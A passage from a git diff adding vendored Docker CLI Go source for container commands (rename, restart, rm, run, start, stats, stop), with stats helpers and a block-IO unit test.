strings.TrimSpace(opts.oldName) + newName := strings.TrimSpace(opts.newName) + + if oldName == "" || newName == "" { + return fmt.Errorf("Error: Neither old nor new names may be empty") + } + + if err := dockerCli.Client().ContainerRename(ctx, oldName, newName); err != nil { + fmt.Fprintf(dockerCli.Err(), "%s\n", err) + return fmt.Errorf("Error: failed to rename container named %s", oldName) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/restart.go b/vendor/github.com/docker/docker/cli/command/container/restart.go new file mode 100644 index 0000000000..fc3ba93c84 --- /dev/null +++ 
b/vendor/github.com/docker/docker/cli/command/container/restart.go @@ -0,0 +1,62 @@ +package container + +import ( + "fmt" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type restartOptions struct { + nSeconds int + nSecondsChanged bool + + containers []string +} + +// NewRestartCommand creates a new cobra.Command for `docker restart` +func NewRestartCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts restartOptions + + cmd := &cobra.Command{ + Use: "restart [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Restart one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + opts.nSecondsChanged = cmd.Flags().Changed("time") + return runRestart(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.IntVarP(&opts.nSeconds, "time", "t", 10, "Seconds to wait for stop before killing the container") + return cmd +} + +func runRestart(dockerCli *command.DockerCli, opts *restartOptions) error { + ctx := context.Background() + var errs []string + var timeout *time.Duration + if opts.nSecondsChanged { + timeoutValue := time.Duration(opts.nSeconds) * time.Second + timeout = &timeoutValue + } + + for _, name := range opts.containers { + if err := dockerCli.Client().ContainerRestart(ctx, name, timeout); err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/rm.go b/vendor/github.com/docker/docker/cli/command/container/rm.go new file mode 100644 index 0000000000..60724f194b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/rm.go @@ -0,0 +1,73 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + 
"github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type rmOptions struct { + rmVolumes bool + rmLink bool + force bool + + containers []string +} + +// NewRmCommand creates a new cobra.Command for `docker rm` +func NewRmCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts rmOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Remove one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runRm(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.rmVolumes, "volumes", "v", false, "Remove the volumes associated with the container") + flags.BoolVarP(&opts.rmLink, "link", "l", false, "Remove the specified link") + flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of a running container (uses SIGKILL)") + return cmd +} + +func runRm(dockerCli *command.DockerCli, opts *rmOptions) error { + ctx := context.Background() + + var errs []string + options := types.ContainerRemoveOptions{ + RemoveVolumes: opts.rmVolumes, + RemoveLinks: opts.rmLink, + Force: opts.force, + } + + errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { + if container == "" { + return fmt.Errorf("Container name cannot be empty") + } + container = strings.Trim(container, "/") + return dockerCli.Client().ContainerRemove(ctx, container, options) + }) + + for _, name := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/run.go b/vendor/github.com/docker/docker/cli/command/container/run.go new file mode 100644 index 
0000000000..0fad93e688 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/run.go @@ -0,0 +1,285 @@ +package container + +import ( + "fmt" + "io" + "net/http/httputil" + "os" + "runtime" + "strings" + "syscall" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + opttypes "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/signal" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/libnetwork/resolvconf/dns" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type runOptions struct { + detach bool + sigProxy bool + name string + detachKeys string +} + +// NewRunCommand create a new `docker run` command +func NewRunCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts runOptions + var copts *runconfigopts.ContainerOptions + + cmd := &cobra.Command{ + Use: "run [OPTIONS] IMAGE [COMMAND] [ARG...]", + Short: "Run a command in a new container", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + copts.Image = args[0] + if len(args) > 1 { + copts.Args = args[1:] + } + return runRun(dockerCli, cmd.Flags(), &opts, copts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + // These are flags not stored in Config/HostConfig + flags.BoolVarP(&opts.detach, "detach", "d", false, "Run container in background and print container ID") + flags.BoolVar(&opts.sigProxy, "sig-proxy", true, "Proxy received signals to the process") + flags.StringVar(&opts.name, "name", "", "Assign a name to the container") + flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") + + // Add an explicit help that doesn't have a `-h` to prevent the conflict + // with hostname + flags.Bool("help", false, "Print usage") + + command.AddTrustedFlags(flags, true) 
+ copts = runconfigopts.AddFlags(flags) + return cmd +} + +func runRun(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *runOptions, copts *runconfigopts.ContainerOptions) error { + stdout, stderr, stdin := dockerCli.Out(), dockerCli.Err(), dockerCli.In() + client := dockerCli.Client() + // TODO: pass this as an argument + cmdPath := "run" + + var ( + flAttach *opttypes.ListOpts + ErrConflictAttachDetach = fmt.Errorf("Conflicting options: -a and -d") + ErrConflictRestartPolicyAndAutoRemove = fmt.Errorf("Conflicting options: --restart and --rm") + ) + + config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) + + // just in case the Parse does not exit + if err != nil { + reportError(stderr, cmdPath, err.Error(), true) + return cli.StatusError{StatusCode: 125} + } + + if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return ErrConflictRestartPolicyAndAutoRemove + } + if hostConfig.OomKillDisable != nil && *hostConfig.OomKillDisable && hostConfig.Memory == 0 { + fmt.Fprintf(stderr, "WARNING: Disabling the OOM killer on containers without setting a '-m/--memory' limit may be dangerous.\n") + } + + if len(hostConfig.DNS) > 0 { + // check the DNS settings passed via --dns against + // localhost regexp to warn if they are trying to + // set a DNS to a localhost address + for _, dnsIP := range hostConfig.DNS { + if dns.IsLocalhost(dnsIP) { + fmt.Fprintf(stderr, "WARNING: Localhost DNS setting (--dns=%s) may fail in containers.\n", dnsIP) + break + } + } + } + + config.ArgsEscaped = false + + if !opts.detach { + if err := dockerCli.In().CheckTty(config.AttachStdin, config.Tty); err != nil { + return err + } + } else { + if fl := flags.Lookup("attach"); fl != nil { + flAttach = fl.Value.(*opttypes.ListOpts) + if flAttach.Len() != 0 { + return ErrConflictAttachDetach + } + } + + config.AttachStdin = false + config.AttachStdout = false + config.AttachStderr = false + config.StdinOnce = false + } + + // Disable sigProxy when in 
TTY mode + if config.Tty { + opts.sigProxy = false + } + + // Telling the Windows daemon the initial size of the tty during start makes + // a far better user experience rather than relying on subsequent resizes + // to cause things to catch up. + if runtime.GOOS == "windows" { + hostConfig.ConsoleSize[0], hostConfig.ConsoleSize[1] = dockerCli.Out().GetTtySize() + } + + ctx, cancelFun := context.WithCancel(context.Background()) + + createResponse, err := createContainer(ctx, dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) + if err != nil { + reportError(stderr, cmdPath, err.Error(), true) + return runStartContainerErr(err) + } + if opts.sigProxy { + sigc := ForwardAllSignals(ctx, dockerCli, createResponse.ID) + defer signal.StopCatch(sigc) + } + var ( + waitDisplayID chan struct{} + errCh chan error + ) + if !config.AttachStdout && !config.AttachStderr { + // Make this asynchronous to allow the client to write to stdin before having to read the ID + waitDisplayID = make(chan struct{}) + go func() { + defer close(waitDisplayID) + fmt.Fprintf(stdout, "%s\n", createResponse.ID) + }() + } + attach := config.AttachStdin || config.AttachStdout || config.AttachStderr + if attach { + var ( + out, cerr io.Writer + in io.ReadCloser + ) + if config.AttachStdin { + in = stdin + } + if config.AttachStdout { + out = stdout + } + if config.AttachStderr { + if config.Tty { + cerr = stdout + } else { + cerr = stderr + } + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + options := types.ContainerAttachOptions{ + Stream: true, + Stdin: config.AttachStdin, + Stdout: config.AttachStdout, + Stderr: config.AttachStderr, + DetachKeys: dockerCli.ConfigFile().DetachKeys, + } + + resp, errAttach := client.ContainerAttach(ctx, createResponse.ID, options) + if errAttach != nil && errAttach != httputil.ErrPersistEOF { + // ContainerAttach returns an ErrPersistEOF (connection closed) + // means server met an 
error and put it in Hijacked connection + // keep the error and read detailed error message from hijacked connection later + return errAttach + } + defer resp.Close() + + errCh = promise.Go(func() error { + errHijack := holdHijackedConnection(ctx, dockerCli, config.Tty, in, out, cerr, resp) + if errHijack == nil { + return errAttach + } + return errHijack + }) + } + + statusChan := waitExitOrRemoved(ctx, dockerCli, createResponse.ID, hostConfig.AutoRemove) + + //start the container + if err := client.ContainerStart(ctx, createResponse.ID, types.ContainerStartOptions{}); err != nil { + // If we have holdHijackedConnection, we should notify + // holdHijackedConnection we are going to exit and wait + // to avoid the terminal are not restored. + if attach { + cancelFun() + <-errCh + } + + reportError(stderr, cmdPath, err.Error(), false) + if hostConfig.AutoRemove { + // wait container to be removed + <-statusChan + } + return runStartContainerErr(err) + } + + if (config.AttachStdin || config.AttachStdout || config.AttachStderr) && config.Tty && dockerCli.Out().IsTerminal() { + if err := MonitorTtySize(ctx, dockerCli, createResponse.ID, false); err != nil { + fmt.Fprintf(stderr, "Error monitoring TTY size: %s\n", err) + } + } + + if errCh != nil { + if err := <-errCh; err != nil { + logrus.Debugf("Error hijack: %s", err) + return err + } + } + + // Detached mode: wait for the id to be displayed and return. 
+ if !config.AttachStdout && !config.AttachStderr { + // Detached mode + <-waitDisplayID + return nil + } + + status := <-statusChan + if status != 0 { + return cli.StatusError{StatusCode: status} + } + return nil +} + +// reportError is a utility method that prints a user-friendly message +// containing the error that occurred during parsing and a suggestion to get help +func reportError(stderr io.Writer, name string, str string, withHelp bool) { + if withHelp { + str += ".\nSee '" + os.Args[0] + " " + name + " --help'" + } + fmt.Fprintf(stderr, "%s: %s.\n", os.Args[0], str) +} + +// if container start fails with 'not found'/'no such' error, return 127 +// if container start fails with 'permission denied' error, return 126 +// return 125 for generic docker daemon failures +func runStartContainerErr(err error) error { + trimmedErr := strings.TrimPrefix(err.Error(), "Error response from daemon: ") + statusError := cli.StatusError{StatusCode: 125} + if strings.Contains(trimmedErr, "executable file not found") || + strings.Contains(trimmedErr, "no such file or directory") || + strings.Contains(trimmedErr, "system cannot find the file specified") { + statusError = cli.StatusError{StatusCode: 127} + } else if strings.Contains(trimmedErr, syscall.EACCES.Error()) { + statusError = cli.StatusError{StatusCode: 126} + } + + return statusError +} diff --git a/vendor/github.com/docker/docker/cli/command/container/start.go b/vendor/github.com/docker/docker/cli/command/container/start.go new file mode 100644 index 0000000000..3521a41949 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/start.go @@ -0,0 +1,179 @@ +package container + +import ( + "fmt" + "io" + "net/http/httputil" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/signal" + "github.com/spf13/cobra" +) + +type 
startOptions struct { + attach bool + openStdin bool + detachKeys string + checkpoint string + checkpointDir string + + containers []string +} + +// NewStartCommand creates a new cobra.Command for `docker start` +func NewStartCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts startOptions + + cmd := &cobra.Command{ + Use: "start [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Start one or more stopped containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runStart(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.attach, "attach", "a", false, "Attach STDOUT/STDERR and forward signals") + flags.BoolVarP(&opts.openStdin, "interactive", "i", false, "Attach container's STDIN") + flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") + + flags.StringVar(&opts.checkpoint, "checkpoint", "", "Restore from this checkpoint") + flags.SetAnnotation("checkpoint", "experimental", nil) + flags.StringVar(&opts.checkpointDir, "checkpoint-dir", "", "Use a custom checkpoint storage directory") + flags.SetAnnotation("checkpoint-dir", "experimental", nil) + return cmd +} + +func runStart(dockerCli *command.DockerCli, opts *startOptions) error { + ctx, cancelFun := context.WithCancel(context.Background()) + + if opts.attach || opts.openStdin { + // We're going to attach to a container. + // 1. Ensure we only have one container. + if len(opts.containers) > 1 { + return fmt.Errorf("You cannot start and attach multiple containers at once.") + } + + // 2. Attach to the container. 
+ container := opts.containers[0] + c, err := dockerCli.Client().ContainerInspect(ctx, container) + if err != nil { + return err + } + + // We always use c.ID instead of container to maintain consistency during `docker start` + if !c.Config.Tty { + sigc := ForwardAllSignals(ctx, dockerCli, c.ID) + defer signal.StopCatch(sigc) + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + options := types.ContainerAttachOptions{ + Stream: true, + Stdin: opts.openStdin && c.Config.OpenStdin, + Stdout: true, + Stderr: true, + DetachKeys: dockerCli.ConfigFile().DetachKeys, + } + + var in io.ReadCloser + + if options.Stdin { + in = dockerCli.In() + } + + resp, errAttach := dockerCli.Client().ContainerAttach(ctx, c.ID, options) + if errAttach != nil && errAttach != httputil.ErrPersistEOF { + // ContainerAttach return an ErrPersistEOF (connection closed) + // means server met an error and already put it in Hijacked connection, + // we would keep the error and read the detailed error message from hijacked connection + return errAttach + } + defer resp.Close() + cErr := promise.Go(func() error { + errHijack := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp) + if errHijack == nil { + return errAttach + } + return errHijack + }) + + // 3. We should open a channel for receiving status code of the container + // no matter it's detached, removed on daemon side(--rm) or exit normally. + statusChan := waitExitOrRemoved(ctx, dockerCli, c.ID, c.HostConfig.AutoRemove) + startOptions := types.ContainerStartOptions{ + CheckpointID: opts.checkpoint, + CheckpointDir: opts.checkpointDir, + } + + // 4. Start the container. + if err := dockerCli.Client().ContainerStart(ctx, c.ID, startOptions); err != nil { + cancelFun() + <-cErr + if c.HostConfig.AutoRemove { + // wait container to be removed + <-statusChan + } + return err + } + + // 5. Wait for attachment to break. 
+ if c.Config.Tty && dockerCli.Out().IsTerminal() { + if err := MonitorTtySize(ctx, dockerCli, c.ID, false); err != nil { + fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) + } + } + if attchErr := <-cErr; attchErr != nil { + return attchErr + } + + if status := <-statusChan; status != 0 { + return cli.StatusError{StatusCode: status} + } + } else if opts.checkpoint != "" { + if len(opts.containers) > 1 { + return fmt.Errorf("You cannot restore multiple containers at once.") + } + container := opts.containers[0] + startOptions := types.ContainerStartOptions{ + CheckpointID: opts.checkpoint, + CheckpointDir: opts.checkpointDir, + } + return dockerCli.Client().ContainerStart(ctx, container, startOptions) + + } else { + // We're not going to attach to anything. + // Start as many containers as we want. + return startContainersWithoutAttachments(ctx, dockerCli, opts.containers) + } + + return nil +} + +func startContainersWithoutAttachments(ctx context.Context, dockerCli *command.DockerCli, containers []string) error { + var failedContainers []string + for _, container := range containers { + if err := dockerCli.Client().ContainerStart(ctx, container, types.ContainerStartOptions{}); err != nil { + fmt.Fprintf(dockerCli.Err(), "%s\n", err) + failedContainers = append(failedContainers, container) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + + if len(failedContainers) > 0 { + return fmt.Errorf("Error: failed to start containers: %v", strings.Join(failedContainers, ", ")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats.go b/vendor/github.com/docker/docker/cli/command/container/stats.go new file mode 100644 index 0000000000..12d5c68522 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stats.go @@ -0,0 +1,243 @@ +package container + +import ( + "fmt" + "io" + "strings" + "sync" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + 
"github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/spf13/cobra" +) + +type statsOptions struct { + all bool + noStream bool + format string + containers []string +} + +// NewStatsCommand creates a new cobra.Command for `docker stats` +func NewStatsCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts statsOptions + + cmd := &cobra.Command{ + Use: "stats [OPTIONS] [CONTAINER...]", + Short: "Display a live stream of container(s) resource usage statistics", + Args: cli.RequiresMinArgs(0), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runStats(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") + flags.BoolVar(&opts.noStream, "no-stream", false, "Disable streaming stats and only pull the first result") + flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") + return cmd +} + +// runStats displays a live stream of resource usage statistics for one or more containers. +// This shows real-time information on CPU usage, memory usage, and network I/O. +func runStats(dockerCli *command.DockerCli, opts *statsOptions) error { + showAll := len(opts.containers) == 0 + closeChan := make(chan error) + + ctx := context.Background() + + // monitorContainerEvents watches for container creation and removal (only + // used when calling `docker stats` without arguments). + monitorContainerEvents := func(started chan<- struct{}, c chan events.Message) { + f := filters.NewArgs() + f.Add("type", "container") + options := types.EventsOptions{ + Filters: f, + } + + eventq, errq := dockerCli.Client().Events(ctx, options) + + // Whether we successfully subscribed to eventq or not, we can now + // unblock the main goroutine. 
+ close(started) + + for { + select { + case event := <-eventq: + c <- event + case err := <-errq: + closeChan <- err + return + } + } + } + + // Get the daemonOSType if not set already + if daemonOSType == "" { + svctx := context.Background() + sv, err := dockerCli.Client().ServerVersion(svctx) + if err != nil { + return err + } + daemonOSType = sv.Os + } + + // waitFirst is a WaitGroup to wait first stat data's reach for each container + waitFirst := &sync.WaitGroup{} + + cStats := stats{} + // getContainerList simulates creation event for all previously existing + // containers (only used when calling `docker stats` without arguments). + getContainerList := func() { + options := types.ContainerListOptions{ + All: opts.all, + } + cs, err := dockerCli.Client().ContainerList(ctx, options) + if err != nil { + closeChan <- err + } + for _, container := range cs { + s := formatter.NewContainerStats(container.ID[:12], daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + } + } + + if showAll { + // If no names were specified, start a long running goroutine which + // monitors container events. We make sure we're subscribed before + // retrieving the list of running containers to avoid a race where we + // would "miss" a creation. 
+ started := make(chan struct{}) + eh := command.InitEventHandler() + eh.Handle("create", func(e events.Message) { + if opts.all { + s := formatter.NewContainerStats(e.ID[:12], daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + } + }) + + eh.Handle("start", func(e events.Message) { + s := formatter.NewContainerStats(e.ID[:12], daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + }) + + eh.Handle("die", func(e events.Message) { + if !opts.all { + cStats.remove(e.ID[:12]) + } + }) + + eventChan := make(chan events.Message) + go eh.Watch(eventChan) + go monitorContainerEvents(started, eventChan) + defer close(eventChan) + <-started + + // Start a short-lived goroutine to retrieve the initial list of + // containers. + getContainerList() + } else { + // Artificially send creation events for the containers we were asked to + // monitor (same code path than we use when monitoring all containers). + for _, name := range opts.containers { + s := formatter.NewContainerStats(name, daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + } + + // We don't expect any asynchronous errors: closeChan can be closed. + close(closeChan) + + // Do a quick pause to detect any error with the provided list of + // container names. 
+ time.Sleep(1500 * time.Millisecond) + var errs []string + cStats.mu.Lock() + for _, c := range cStats.cs { + cErr := c.GetError() + if cErr != nil { + errs = append(errs, fmt.Sprintf("%s: %v", c.Name, cErr)) + } + } + cStats.mu.Unlock() + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, ", ")) + } + } + + // before print to screen, make sure each container get at least one valid stat data + waitFirst.Wait() + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().StatsFormat) > 0 { + format = dockerCli.ConfigFile().StatsFormat + } else { + format = formatter.TableFormatKey + } + } + statsCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewStatsFormat(format, daemonOSType), + } + cleanScreen := func() { + if !opts.noStream { + fmt.Fprint(dockerCli.Out(), "\033[2J") + fmt.Fprint(dockerCli.Out(), "\033[H") + } + } + + var err error + for range time.Tick(500 * time.Millisecond) { + cleanScreen() + ccstats := []formatter.StatsEntry{} + cStats.mu.Lock() + for _, c := range cStats.cs { + ccstats = append(ccstats, c.GetStatistics()) + } + cStats.mu.Unlock() + if err = formatter.ContainerStatsWrite(statsCtx, ccstats); err != nil { + break + } + if len(cStats.cs) == 0 && !showAll { + break + } + if opts.noStream { + break + } + select { + case err, ok := <-closeChan: + if ok { + if err != nil { + // this is suppressing "unexpected EOF" in the cli when the + // daemon restarts so it shutdowns cleanly + if err == io.ErrUnexpectedEOF { + return nil + } + return err + } + } + default: + // just skip + } + } + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go new file mode 100644 index 0000000000..4b57e3fe05 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go @@ -0,0 +1,226 @@ +package container + +import ( + "encoding/json" + "errors" + "io" + "strings" + 
"sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/client" + "golang.org/x/net/context" +) + +type stats struct { + ostype string + mu sync.Mutex + cs []*formatter.ContainerStats +} + +// daemonOSType is set once we have at least one stat for a container +// from the daemon. It is used to ensure we print the right header based +// on the daemon platform. +var daemonOSType string + +func (s *stats) add(cs *formatter.ContainerStats) bool { + s.mu.Lock() + defer s.mu.Unlock() + if _, exists := s.isKnownContainer(cs.Container); !exists { + s.cs = append(s.cs, cs) + return true + } + return false +} + +func (s *stats) remove(id string) { + s.mu.Lock() + if i, exists := s.isKnownContainer(id); exists { + s.cs = append(s.cs[:i], s.cs[i+1:]...) + } + s.mu.Unlock() +} + +func (s *stats) isKnownContainer(cid string) (int, bool) { + for i, c := range s.cs { + if c.Container == cid { + return i, true + } + } + return -1, false +} + +func collect(ctx context.Context, s *formatter.ContainerStats, cli client.APIClient, streamStats bool, waitFirst *sync.WaitGroup) { + logrus.Debugf("collecting stats for %s", s.Container) + var ( + getFirst bool + previousCPU uint64 + previousSystem uint64 + u = make(chan error, 1) + ) + + defer func() { + // if error happens and we get nothing of stats, release wait group whatever + if !getFirst { + getFirst = true + waitFirst.Done() + } + }() + + response, err := cli.ContainerStats(ctx, s.Container, streamStats) + if err != nil { + s.SetError(err) + return + } + defer response.Body.Close() + + dec := json.NewDecoder(response.Body) + go func() { + for { + var ( + v *types.StatsJSON + memPercent = 0.0 + cpuPercent = 0.0 + blkRead, blkWrite uint64 // Only used on Linux + mem = 0.0 + memLimit = 0.0 + memPerc = 0.0 + pidsStatsCurrent uint64 + ) + + if err := dec.Decode(&v); err != nil { + dec = 
json.NewDecoder(io.MultiReader(dec.Buffered(), response.Body)) + u <- err + if err == io.EOF { + break + } + time.Sleep(100 * time.Millisecond) + continue + } + + daemonOSType = response.OSType + + if daemonOSType != "windows" { + // MemoryStats.Limit will never be 0 unless the container is not running and we haven't + // got any data from cgroup + if v.MemoryStats.Limit != 0 { + memPercent = float64(v.MemoryStats.Usage) / float64(v.MemoryStats.Limit) * 100.0 + } + previousCPU = v.PreCPUStats.CPUUsage.TotalUsage + previousSystem = v.PreCPUStats.SystemUsage + cpuPercent = calculateCPUPercentUnix(previousCPU, previousSystem, v) + blkRead, blkWrite = calculateBlockIO(v.BlkioStats) + mem = float64(v.MemoryStats.Usage) + memLimit = float64(v.MemoryStats.Limit) + memPerc = memPercent + pidsStatsCurrent = v.PidsStats.Current + } else { + cpuPercent = calculateCPUPercentWindows(v) + blkRead = v.StorageStats.ReadSizeBytes + blkWrite = v.StorageStats.WriteSizeBytes + mem = float64(v.MemoryStats.PrivateWorkingSet) + } + netRx, netTx := calculateNetwork(v.Networks) + s.SetStatistics(formatter.StatsEntry{ + Name: v.Name, + ID: v.ID, + CPUPercentage: cpuPercent, + Memory: mem, + MemoryPercentage: memPerc, + MemoryLimit: memLimit, + NetworkRx: netRx, + NetworkTx: netTx, + BlockRead: float64(blkRead), + BlockWrite: float64(blkWrite), + PidsCurrent: pidsStatsCurrent, + }) + u <- nil + if !streamStats { + return + } + } + }() + for { + select { + case <-time.After(2 * time.Second): + // zero out the values if we have not received an update within + // the specified duration. 
+ s.SetErrorAndReset(errors.New("timeout waiting for stats")) + // if this is the first stat you get, release WaitGroup + if !getFirst { + getFirst = true + waitFirst.Done() + } + case err := <-u: + if err != nil { + s.SetError(err) + continue + } + s.SetError(nil) + // if this is the first stat you get, release WaitGroup + if !getFirst { + getFirst = true + waitFirst.Done() + } + } + if !streamStats { + return + } + } +} + +func calculateCPUPercentUnix(previousCPU, previousSystem uint64, v *types.StatsJSON) float64 { + var ( + cpuPercent = 0.0 + // calculate the change for the cpu usage of the container in between readings + cpuDelta = float64(v.CPUStats.CPUUsage.TotalUsage) - float64(previousCPU) + // calculate the change for the entire system between readings + systemDelta = float64(v.CPUStats.SystemUsage) - float64(previousSystem) + ) + + if systemDelta > 0.0 && cpuDelta > 0.0 { + cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 + } + return cpuPercent +} + +func calculateCPUPercentWindows(v *types.StatsJSON) float64 { + // Max number of 100ns intervals between the previous time read and now + possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals + possIntervals /= 100 // Convert to number of 100ns intervals + possIntervals *= uint64(v.NumProcs) // Multiple by the number of processors + + // Intervals used + intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage + + // Percentage avoiding divide-by-zero + if possIntervals > 0 { + return float64(intervalsUsed) / float64(possIntervals) * 100.0 + } + return 0.00 +} + +func calculateBlockIO(blkio types.BlkioStats) (blkRead uint64, blkWrite uint64) { + for _, bioEntry := range blkio.IoServiceBytesRecursive { + switch strings.ToLower(bioEntry.Op) { + case "read": + blkRead = blkRead + bioEntry.Value + case "write": + blkWrite = blkWrite + bioEntry.Value + } + } + return +} + +func 
calculateNetwork(network map[string]types.NetworkStats) (float64, float64) { + var rx, tx float64 + + for _, v := range network { + rx += float64(v.RxBytes) + tx += float64(v.TxBytes) + } + return rx, tx +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go new file mode 100644 index 0000000000..828d634c8a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go @@ -0,0 +1,20 @@ +package container + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestCalculateBlockIO(t *testing.T) { + blkio := types.BlkioStats{ + IoServiceBytesRecursive: []types.BlkioStatEntry{{8, 0, "read", 1234}, {8, 1, "read", 4567}, {8, 0, "write", 123}, {8, 1, "write", 456}}, + } + blkRead, blkWrite := calculateBlockIO(blkio) + if blkRead != 5801 { + t.Fatalf("blkRead = %d, want 5801", blkRead) + } + if blkWrite != 579 { + t.Fatalf("blkWrite = %d, want 579", blkWrite) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stop.go b/vendor/github.com/docker/docker/cli/command/container/stop.go new file mode 100644 index 0000000000..c68ede5368 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stop.go @@ -0,0 +1,67 @@ +package container + +import ( + "fmt" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type stopOptions struct { + time int + timeChanged bool + + containers []string +} + +// NewStopCommand creates a new cobra.Command for `docker stop` +func NewStopCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts stopOptions + + cmd := &cobra.Command{ + Use: "stop [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Stop one or more running containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + 
